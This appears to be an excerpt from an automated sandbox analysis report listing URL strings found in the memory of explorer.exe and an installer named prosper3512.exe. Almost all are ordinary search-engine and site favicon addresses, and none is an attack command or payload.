          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: prosper3512.exe, prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: prosper3512.exe, 00000004.00000002.2087395061.00000000021D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2090043986.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2098155227.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2097141006.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2089277901.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: prosper3512.exe, 00000004.00000002.2087395061.00000000021D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2090043986.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
